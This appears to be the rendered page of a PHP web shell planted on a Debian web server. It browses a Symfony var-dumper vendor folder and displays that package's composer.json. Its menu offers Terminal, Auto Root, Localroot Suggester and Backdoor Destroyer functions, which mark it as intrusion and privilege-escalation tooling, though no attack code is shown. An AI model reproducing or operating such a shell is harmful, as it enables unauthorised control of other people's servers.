Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
vendor /
symfony /
var-dumper /
Delete
Unzip
Name
Size
Permission
Date
Action
Caster
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Cloner
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Command
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Dumper
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Exception
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Resources
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Server
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
Test
[ DIR ]
drwxr-xr-x
2025-09-11 10:12
CHANGELOG.md
3.14
KB
-rw-r--r--
2025-09-11 10:12
LICENSE
1.04
KB
-rw-r--r--
2025-09-11 10:12
README.md
607
B
-rw-r--r--
2025-09-11 10:12
VarDumper.php
3.96
KB
-rw-r--r--
2025-09-11 10:12
composer.json
1.17
KB
-rw-r--r--
2025-09-11 10:12
Save
Rename
{ "name": "symfony/var-dumper", "type": "library", "description": "Provides mechanisms for walking through any arbitrary PHP variable", "keywords": ["dump", "debug"], "homepage": "https://symfony.com", "license": "MIT", "authors": [ { "name": "Nicolas Grekas", "email": "p@tchwork.com" }, { "name": "Symfony Community", "homepage": "https://symfony.com/contributors" } ], "require": { "php": ">=8.2", "symfony/deprecation-contracts": "^2.5|^3", "symfony/polyfill-mbstring": "~1.0" }, "require-dev": { "symfony/console": "^6.4|^7.0", "symfony/http-kernel": "^6.4|^7.0", "symfony/process": "^6.4|^7.0", "symfony/uid": "^6.4|^7.0", "twig/twig": "^3.12" }, "conflict": { "symfony/console": "<6.4" }, "autoload": { "files": [ "Resources/functions/dump.php" ], "psr-4": { "Symfony\\Component\\VarDumper\\": "" }, "exclude-from-classmap": [ "/Tests/" ] }, "bin": [ "Resources/bin/var-dump-server" ], "minimum-stability": "dev" }